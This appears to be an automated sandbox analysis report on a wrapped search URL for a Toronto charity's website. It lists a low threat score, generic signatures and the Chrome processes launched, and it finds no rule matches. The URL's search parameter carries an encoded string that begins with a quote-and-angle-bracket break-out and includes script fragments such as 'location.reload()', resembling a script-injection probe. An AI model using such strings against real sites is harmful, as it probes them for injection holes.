Windows
Analysis Report
https://urldefense.com/v3/__https://covenanthousetoronto.ca/?s=*22*3E*7CCryptography*20menu.get=*mime**A20**Aintelligence.start(*dispatchEvent*)*20lib*20**Acomputing(*start*).reality*20onUpdated**B7C*20Blockchain**B20gif**A20location.reload()**B20web*22*20rsc*60*20door(*20remake=*20redo)**B20onstart
Overview
General Information
Detection
Score: 20
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Very long command line found
Stores files to the Windows start menu directory
Classification
- System is w10x64
- chrome.exe (PID: 3584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 8D1C4713ACB7CC2AAAEE4477C58A80BA)
- chrome.exe (PID: 3496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1904,i,17923994011528251687,16385674197559425978,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 8D1C4713ACB7CC2AAAEE4477C58A80BA)
- chrome.exe (PID: 5528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://urldefense.com/v3/__https://covenanthousetoronto.ca/?s=…" MD5: 8D1C4713ACB7CC2AAAEE4477C58A80BA)
- cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched